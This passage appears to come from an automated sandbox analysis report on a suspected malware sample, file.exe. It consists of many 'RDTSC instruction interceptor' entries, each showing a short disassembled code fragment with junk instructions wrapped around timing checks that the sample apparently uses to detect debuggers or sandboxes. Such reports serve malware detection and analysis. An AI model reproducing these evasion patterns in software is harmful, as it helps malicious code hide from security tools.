Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D4722 second address: 6D473C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FD0F8CDABE6h 0x0000000f jmp 00007FD0F8CDABEBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F57B second address: 73F5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 ja 00007FD0F8E1A7B4h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FD0F8E1A7A6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F5A2 second address: 73F5DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jo 00007FD0F8CDABE6h 0x00000010 pop ebx 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push esi 0x00000015 push eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jc 00007FD0F8CDABE8h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F72C second address: 73F732 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F732 second address: 73F757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b je 00007FD0F8CDAC0Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F757 second address: 73F75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F75B second address: 73F787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jo 00007FD0F8CDABE6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F787 second address: 73F78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F88E second address: 73F893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F893 second address: 73F908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FD0F8E1A7A6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007FD0F8E1A7B9h 0x00000015 jmp 00007FD0F8E1A7B3h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jg 00007FD0F8E1A7C4h 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007FD0F8E1A7B5h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jl 00007FD0F8E1A7ACh 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F908 second address: 73F90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F90C second address: 73F926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0F8E1A7B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74605C second address: 7460AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD0F8CDABE6h 0x0000000a jmp 00007FD0F8CDABF4h 0x0000000f popad 0x00000010 jmp 00007FD0F8CDABF6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD0F8CDABF8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7460AE second address: 7460BA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8E1A7A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744BED second address: 744BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744BF3 second address: 744C03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744C03 second address: 744C2E instructions: 0x00000000 rdtsc 0x00000002 je 00007FD0F8CDABF2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FD0F8CDABE6h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744C2E second address: 744C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0F8E1A7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7454F1 second address: 7454FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7457F7 second address: 74581A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007FD0F8E1A7BAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74581A second address: 745824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD0F8CDABE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745986 second address: 74598A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74598A second address: 7459B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEEh 0x00000007 jmp 00007FD0F8CDABF4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459B4 second address: 7459B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459B8 second address: 7459BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459BE second address: 7459C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459C4 second address: 7459E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD0F8CDABE6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD0F8CDABF3h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459E7 second address: 7459EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459EB second address: 7459FD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459FD second address: 745A15 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FD0F8E1A7AEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745A15 second address: 745A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745A34 second address: 745A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745D0D second address: 745D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745E5F second address: 745E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745E63 second address: 745E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD0F8CDABE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jnp 00007FD0F8CDABE6h 0x00000013 ja 00007FD0F8CDABE6h 0x00000019 pop edi 0x0000001a jmp 00007FD0F8CDABF4h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CA35D second address: 6CA361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71FEDA second address: 700043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jnp 00007FD0F8CDABF4h 0x0000000c jmp 00007FD0F8CDABEEh 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D2AA3h] 0x00000018 call dword ptr [ebp+122D2DE6h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD0F8CDABF1h 0x00000025 push esi 0x00000026 push edx 0x00000027 pop edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a pop esi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72001B second address: 720036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 720036 second address: 720048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a ja 00007FD0F8CDABECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 720409 second address: 720447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 72EF5572h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FD0F8E1A7A8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 call 00007FD0F8E1A7A9h 0x0000002e push eax 0x0000002f push edx 0x00000030 push ecx 0x00000031 ja 00007FD0F8E1A7A6h 0x00000037 pop ecx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 720447 second address: 72048F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FD0F8CDABEAh 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jns 00007FD0F8CDABEAh 0x0000001e mov eax, dword ptr [eax] 0x00000020 jl 00007FD0F8CDABF2h 0x00000026 jc 00007FD0F8CDABECh 0x0000002c jno 00007FD0F8CDABE6h 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 jnl 00007FD0F8CDABE6h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72051B second address: 72051F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72051F second address: 720528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7208D6 second address: 7208DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7208DC second address: 7208E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 721112 second address: 721117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 721117 second address: 721168 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007FD0F8CDABEEh 0x0000000f nop 0x00000010 jl 00007FD0F8CDABEAh 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a lea eax, dword ptr [ebp+12494C5Fh] 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007FD0F8CDABE8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a sub edx, 29D034AEh 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 push eax 0x00000045 pop eax 0x00000046 pop ebx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 721168 second address: 700B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8E1A7ABh 0x0000000f nop 0x00000010 add ecx, 72B01255h 0x00000016 mov edx, dword ptr [ebp+122D2DAAh] 0x0000001c call dword ptr [ebp+1245BD22h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007FD0F8E1A7AAh 0x0000002c jng 00007FD0F8E1A7A6h 0x00000032 push esi 0x00000033 pop esi 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2B8C second address: 6D2B91 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2B91 second address: 6D2B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2B9C second address: 6D2BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2BA0 second address: 6D2BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FD0F8E1A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0F8E1A7B0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2BC0 second address: 6D2BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749734 second address: 749741 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749741 second address: 749760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007FD0F8CDABF0h 0x0000000c jnp 00007FD0F8CDABECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749895 second address: 7498AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749BBC second address: 749BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABF5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749BD7 second address: 749BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749BDB second address: 749BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749EDB second address: 749EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74A195 second address: 74A19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74A19E second address: 74A1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E925 second address: 74E941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FD0F8CDABF1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E941 second address: 74E945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E945 second address: 74E953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD0F8CDAC00h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EAF5 second address: 74EAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EDF4 second address: 74EDFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EDFA second address: 74EE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD0F8E1A7A8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EE08 second address: 74EE28 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0F8CDABECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD0F8CDABECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74EE28 second address: 74EE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7ADh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8E1A7AAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F253 second address: 74F264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F264 second address: 74F269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F4F0 second address: 74F4FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FD0F8CDABE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F4FC second address: 74F532 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0F8E1A7ACh 0x00000008 jng 00007FD0F8E1A7A6h 0x0000000e pushad 0x0000000f jc 00007FD0F8E1A7A6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD0F8E1A7B7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F664 second address: 74F676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FD0F8CDABE6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F676 second address: 74F680 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F680 second address: 74F6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FD0F8CDABF2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F6B0 second address: 74F6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jnl 00007FD0F8E1A7A6h 0x0000000c jbe 00007FD0F8E1A7A6h 0x00000012 popad 0x00000013 pushad 0x00000014 jg 00007FD0F8E1A7A6h 0x0000001a jmp 00007FD0F8E1A7B5h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F6E1 second address: 74F6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7535DD second address: 7535E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7535E3 second address: 7535E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7535E7 second address: 7535ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7535ED second address: 7535F9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8CDABEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757F9F second address: 757FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FD0F8E1A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FD0F8E1A7A6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C249 second address: 75C261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FD0F8CDABE6h 0x0000000d jmp 00007FD0F8CDABEBh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C261 second address: 75C265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C265 second address: 75C275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FD0F8CDABE6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C79E second address: 75C7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C7A2 second address: 75C7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
